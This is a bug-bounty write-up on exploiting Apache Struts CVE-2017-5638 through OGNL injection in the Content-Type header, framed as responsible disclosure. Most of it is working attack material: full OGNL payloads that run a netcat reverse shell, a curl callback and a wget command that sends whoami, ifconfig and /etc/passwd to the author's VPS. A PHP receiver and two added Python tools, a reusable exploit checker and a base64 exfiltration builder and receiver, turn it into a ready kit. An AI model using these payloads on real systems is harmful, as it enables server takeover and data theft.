Taking Entire Server Control: Part 2 of How I Earned $2500 in 5 Minutes | CVE-2017-5638 | OGNL injection | RCE

Hello, Infosec fam! Welcome to Part 2 of our series on Unleashing the Power of Recon: How I Earned $2500 in 5 Minutes | CVE-2017-5638 | OGNL injection | RCE. If you missed the previous write-up, I highly recommend reading it before diving into this one. In this write-up, we will explore how I exploited this vulnerability to gain a reverse shell.
After confirming the bug by inspecting the response header, I quickly set up my machine and configured port forwarding. Port forwarding (through a tunnelling service) exposes a listener on my machine at a public address, so the target server can connect back to it from anywhere. However, I ran into a few challenges while using ngrok and portmapio.
Despite those challenges, I had confirmed that the application was vulnerable to remote code execution. To proceed, I purchased a VPS, which came with basic Linux tools and a static IP address, and put the VPS IP in the payload to establish a reverse connection. The payload is sent as the value of the Content-Type request header, which is the injection point for CVE-2017-5638.
Payload:
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nc -e /bin/sh x.x.x.x 8090').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
With the payload ready, I started a netcat listener on my VPS to catch the reverse connection:
Listener:
nc -lvp 8090
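The payload above copies the command's output straight into the HTTP response, so a reverse shell is not required to confirm execution. As an added example (not the write-up's own code), the Python below builds the Content-Type header from the page's OGNL template for any command, sends it, and looks for a random marker echoed back in the body; the same builder with `curl http://<your-collaborator-host>/` as the command gives the out-of-band variant used later in the post. The target URL is an assumption, and commands containing single quotes are rejected because they would terminate the OGNL string literal.

```python
# Added example (not the write-up's own code): build the CVE-2017-5638 (S2-045)
# Content-Type header for an arbitrary command and confirm execution in-band.
# The target URL is an assumption; nothing here is specific to the author's target.
import secrets
import urllib.error
import urllib.request

# The OGNL template from the write-up with the command left as a placeholder.
# It disables OGNL's member-access sandbox, runs the command via ProcessBuilder
# and copies the process's combined stdout/stderr into the HTTP response body.
_TEMPLATE = (
    "%{(#_='multipart/form-data')"
    ".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
    ".(#_memberAccess?(#_memberAccess=#dm):("
    "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])"
    ".(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))"
    ".(#ognlUtil.getExcludedPackageNames().clear())"
    ".(#ognlUtil.getExcludedClasses().clear())"
    ".(#context.setMemberAccess(#dm))))"
    ".(#cmd='__CMD__')"
    ".(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))"
    ".(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))"
    ".(#p=new java.lang.ProcessBuilder(#cmds))"
    ".(#p.redirectErrorStream(true))"
    ".(#process=#p.start())"
    ".(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))"
    ".(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))"
    ".(#ros.flush())}"
)


def is_safe_command(cmd: str) -> bool:
    # A single quote would end the OGNL literal; CR/LF would break the header.
    return not any(ch in cmd for ch in "'\r\n")


def build_content_type(cmd: str) -> str:
    """Return the Content-Type header value that executes cmd on the target."""
    if not is_safe_command(cmd):
        raise ValueError("command must not contain single quotes or line breaks")
    return _TEMPLATE.replace("__CMD__", cmd)


def marker_command(marker: str) -> str:
    # Prints the marker on both branches of the payload (cmd.exe and bash).
    return f"echo {marker}"


def output_confirms(body: bytes, marker: str) -> bool:
    """True when the marker came back in the response, i.e. the command ran."""
    return marker.encode("ascii") in body


def check_target(url: str, timeout: float = 10.0) -> tuple[bool, bytes]:
    """POST the marker payload to url and report whether the marker came back."""
    marker = "s2045-" + secrets.token_hex(8)
    req = urllib.request.Request(
        url,
        data=b"",
        method="POST",
        headers={"Content-Type": build_content_type(marker_command(marker))},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read()
    except urllib.error.HTTPError as err:
        # A 4xx/5xx status does not mean the command did not run; inspect the body.
        body = err.read()
    return output_confirms(body, marker), body


if __name__ == "__main__":
    import sys

    # Usage: python s2045_check.py http://target.example/index.action  (URL assumed)
    hit, _ = check_target(sys.argv[1])
    print("vulnerable: marker echoed back" if hit else "no marker in response")
```

Checking for a random marker rather than the presence of `uid=` or a hostname keeps the confirmation unambiguous even when the page normally reflects request content.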
However, after sending the payload through Burp Repeater, nothing came back on the listener. I tried various possibilities, but to no avail. After many failed attempts it struck me that the outbound connection from the server to my listener might be blocked by a firewall. To test that, I fired up my Burp Collaborator client.
Burp Collaborator is a PortSwigger service that gives you a unique hostname and records any DNS lookup or HTTP request made to it, which is how you detect blind (out-of-band) vulnerabilities whose effects never show up in the application's own response.
So I created a payload that makes the server contact a Burp Collaborator link:
Payload:
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='curl http://burpcolab.link/').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

[Image: example Burp Collaborator output; not the actual output from this payload]
With the Collaborator payload, I instantly received HTTP and DNS pingbacks, confirming that the application was executing my commands. I was still unable to obtain a reverse shell, though: the server could evidently resolve names and make outbound HTTP requests but not reach the arbitrary TCP port my netcat listener was on, which is what egress filtering typically looks like. So I switched to "wget" to run Linux commands and send their output to my VPS over HTTP, and wrote a simple PHP script to receive those HTTP requests and append them to a text file.
My first payload read "/etc/passwd" and ran "whoami", "pwd", "ls" and "ifconfig"; the output of each was POSTed to my VPS and stored in a text file.
wget payload:
wget%20-O%20-%20--post-data="whoami=$(whoami)&pwd=$(pwd)&ls=$(ls)&ifconfig=$(ifconfig)&passwd=$(cat%20/etc/passwd)"%20https://xxxxxx/exploit.php
Complete payload:
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget%20-O%20-%20--post-data="whoami=$(whoami)&pwd=$(pwd)&ls=$(ls)&ifconfig=$(ifconfig)&passwd=$(cat%20/etc/passwd)"%20https://xxxxxx/exploit.php').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
PHP code:
<?php
// Get the raw HTTP request body (the wget --post-data payload)
$requestData = file_get_contents('php://input');
// Get the request headers
$headers = getallheaders();
// Get the user agent (guarded in case the client sends none)
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? '';
// Create a string with the HTTP packet information
$httpPacket = "HTTP Request:\n\n";
$httpPacket .= "Headers:\n";
foreach ($headers as $header => $value) {
    $httpPacket .= "$header: $value\n";
}
$httpPacket .= "\n";
$httpPacket .= "User Agent: $userAgent\n\n";
$httpPacket .= "Request Data:\n$requestData\n";
// Append the HTTP packet to the text file
$filename = 'out.txt';
file_put_contents($filename, $httpPacket, FILE_APPEND);
echo "HTTP packet appended to $filename\n";
?>
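As an added example (not the write-up's own code), here is the same HTTP-only exfiltration in Python on both sides: a builder for the wget one-liner that goes into the `#cmd='...'` slot of the payload above, and a receiver that plays the role of the PHP script. Unlike the raw `$(cmd)` form, every result is base64-encoded on the target, so output containing `&`, `=`, `%` or a double quote cannot corrupt the form body, and the command uses literal spaces and no single quotes, which would otherwise end the OGNL literal. The receiver URL, port and field names are assumptions, the sample body in the usage is constructed, and the builder assumes GNU coreutils `base64` on the target (`-w0` disables line wrapping).

```python
# Added example (not the write-up's code): HTTP-only exfiltration for a host whose
# egress allows HTTP(S) but not the raw TCP port a netcat reverse shell needs.
# Builder side emits the shell command to place in #cmd='...' of the S2-045
# payload; receiver side parses and decodes what wget posts. URL/port assumed.
import base64
import binascii
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote


def is_safe_command(cmd: str) -> bool:
    # Must not break the OGNL single-quoted literal, the bash double-quoted
    # --post-data string, or the $( ... ) substitution wrapped around it.
    return not any(ch in cmd for ch in "'\"()\r\n")


def build_exfil_command(fields: dict[str, str], url: str) -> str:
    """Return a wget one-liner that POSTs name=base64(output) pairs to url.

    Assumes GNU coreutils base64 on the target (-w0 disables line wrapping).
    stderr is folded in so a failing command still reports why it failed.
    """
    parts = []
    for name, cmd in fields.items():
        if not name.isidentifier() or not is_safe_command(cmd):
            raise ValueError(f"unsafe field or command: {name}={cmd!r}")
        parts.append(f"{name}=$({cmd} 2>&1 | base64 -w0)")
    body = "&".join(parts)
    return f'wget -q -O - --post-data="{body}" {url}'


def parse_exfil_body(raw: bytes) -> dict[str, str]:
    """Decode an application/x-www-form-urlencoded body whose values are base64.

    Splits each pair on the first '=' only and uses unquote (not unquote_plus),
    so the '+' and '=' characters of base64 survive. Values that do not decode
    as base64 are kept as they arrived rather than dropped.
    """
    out: dict[str, str] = {}
    for pair in raw.decode("ascii", "replace").split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        value = unquote(value)
        try:
            out[name] = base64.b64decode(value, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            out[name] = value
    return out


class ExfilHandler(BaseHTTPRequestHandler):
    """Receiver: append decoded fields from each POST to a text file."""

    log_path = "out.txt"  # assumed output location

    def do_POST(self) -> None:
        length = int(self.headers.get("Content-Length", "0"))
        fields = parse_exfil_body(self.rfile.read(length))
        with open(self.log_path, "a", encoding="utf-8") as fh:
            fh.write(f"--- from {self.client_address[0]} to {self.path}\n")
            for name, value in fields.items():
                fh.write(f"[{name}]\n{value}\n")
        self.send_response(200)
        self.end_headers()


def serve(port: int = 8080) -> None:
    """Run the receiver; port is an assumption."""
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()


if __name__ == "__main__":
    # Command to drop into the payload's #cmd='...' (receiver URL assumed):
    print(build_exfil_command(
        {"whoami": "whoami", "pwd": "pwd", "passwd": "cat /etc/passwd"},
        "http://attacker.example:8080/exfil",
    ))
    # Constructed sample of what the receiver would see for whoami=root, pwd=/opt/tomcat:
    print(parse_exfil_body(b"whoami=cm9vdAo=&pwd=L29wdC90b21jYXQK"))
```

Run `serve()` on the VPS, send the printed one-liner inside the OGNL payload, and each request lands in `out.txt` with the fields already decoded; the `2>&1` also captures the error text when a command is missing on the target, which a bare `$(cmd)` silently drops.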
After successfully recording a proof of concept, I reported the vulnerability to the company. They promptly patched the issue and offered me a bounty as a token of appreciation for my responsible disclosure.
There are further possibilities with this OGNL payload. For instance, the same "wget" command could download files hosted on an attacker's VPS onto the server. I did not test this, since reading files and running OS commands was enough to demonstrate the vulnerability.
Conclusion:
As an ethical hacker, my goal is to expose vulnerabilities and help companies strengthen their security. Exploiting CVE-2017-5638 through OGNL injection and remote code execution was an enlightening experience. Remember, responsible disclosure is key to fostering a safer digital environment.
Happy hacking, and stay secure!
Connect with me:
Twitter: https://twitter.com/karthithehacker
Instagram: https://www.instagram.com/karthithehacker/
LinkedIn: https://www.linkedin.com/in/karthikeyan--v/
Website: https://www.karthithehacker.com/
Github: https://github.com/karthi-the-hacker/
npmjs: https://www.npmjs.com/~karthithehacker
Youtube: https://www.youtube.com/@karthi_the_hacker
Thank you